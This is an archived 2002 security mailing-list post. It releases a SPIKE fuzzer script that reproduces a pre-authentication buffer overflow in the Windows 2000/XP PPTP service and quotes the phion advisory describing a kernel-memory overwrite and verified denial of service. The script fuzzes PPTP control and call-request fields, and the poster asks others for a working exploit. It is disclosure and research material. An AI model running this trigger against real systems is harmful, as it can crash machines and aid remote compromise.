SPIKE 2.6.2 or above should be able to handle this .spk file which will replicate the vulnerability. Someone send me a working sploit in exchange, please. I'm too lazy to muck with it. (Or I have other exploits to muck with, one or the other :>) -dave P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at http://www.immunitysec.com/spike.html, if you haven't already. P.P.S. This script is released under the terms of the GNU GPL v 2.0. On Thu, 2002-09-26 at 05:43, shat_private wrote: > phion Security Advisory 26/09/2002 > > Microsoft PPTP Server and Client remote vulnerability > > > Summary > ----------------------------- > > The Microsoft PPTP Service shipping with Windows 2000 and XP contains a > remotely exploitable pre-authentication bufferoverflow. > > > Affected Systems > ----------------------------- > > Microsoft Windows 2000 and XP running either a PPTP Server or Client. > > > Impact > ----------------------------- > > With a specially crafted PPTP packet it is possible to overwrite kernel > memory. > > A DoS resulting in a lockup of the machine has been verified on > Windows 2000 SP3 and Windows XP. > > A remote compromise should be possible deploying proper shellcode, > as we were able to fill EDI and EDX with our data. > > Clients are vulnerable too, because the Service always listens on port > 1723 on any interface of the machine, this might be of special concern > to DSL users which use PPTP to connect to their modem. > > > Solution > ----------------------------- > > As a temporary solution for the Client issue, one might firewall the PPTP > port in the Internet Connection Firewall for Windows XP. > > We dont know of any solution for Windows 2000 and Windows XP PPTP servers. > > The vendor has been informed. > > > Acknowledgements > ----------------------------- > > The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner > on behalf of phion Information Technologies. > > > Contact Information > ----------------------------- > > phion Information Technologies can be reached via: > officeat_private / http://www.phion.com > > Stephan Hoffmann can be reached via: > shat_private > > Thomas Unterleitner can be reached via: > t.unterleitnerat_private > > References > ----------------------------- > > [1] phion Information Technologies > http://www.phion.com/ > > Exploit > ----------------------------- > > phion Information Technologies will not provide an exploit for this issue. > > > Disclaimer > ----------------------------- > > This advisory does not claim to be complete or to be usable for any > purpose. > > This advisory is free for open distribution in unmodified form. > > Articles or Publications that are based on information from this advisory > have to include link [1]. > > //start control request s_block_start("PPTP"); s_binary_block_size_halfword_bigendian("PPTP"); //message type 1 - control request s_int_variable(0x0001,5); //cookie s_binary("1a 2b 3c 4d"); //type 1 - start control request //5 is big endian halfword s_int_variable(0x0001,5); //reserved s_binary("0000"); //version 1.0 s_int_variable(0x0100,5); //reserved s_binary("0000"); //Framing: Ethernet s_binary("00000003"); //Bearer: Digital s_binary("00000002"); //maximum channels s_binary("ffff"); //firmware revision s_int_variable(0x0001,5); //hostname s_string_variable("A"); s_binary_repeat("00",63); //vendor s_string_variable("A"); s_binary_repeat("00",63); s_block_end("PPTP"); /// /// NEXT PACKET /// /// //start outgoing call request s_block_start("PPTP2"); s_binary_block_size_halfword_bigendian("PPTP2"); //message type 1 - control request s_int_variable(0x0001,5); //cookie s_binary("1a 2b 3c 4d"); //type 1 - outgoing call request //5 is big endian halfword s_int_variable(0x0007,5); //reserved s_binary("0000"); //call id s_binary("0000"); //serial number s_binary("0000"); //min bps s_binary("00000960"); //max bps s_binary("00989680"); //bearer capabilities s_binary("00000002"); //framing s_binary("00000003"); //recieve window size s_binary("0003"); //processing delay s_binary("0000"); s_binary_block_size_halfword_bigendian("PHONENUMBER"); //reserved s_binary("0000"); s_block_start("PHONENUMBER"); s_string_variable(""); s_block_end("PHONENUMBER"); //subaddress s_string_variable(""); s_block_end("PPTP2");
This archive was generated by hypermail 2b30 : Thu Sep 26 2002 - 15:27:53 PDT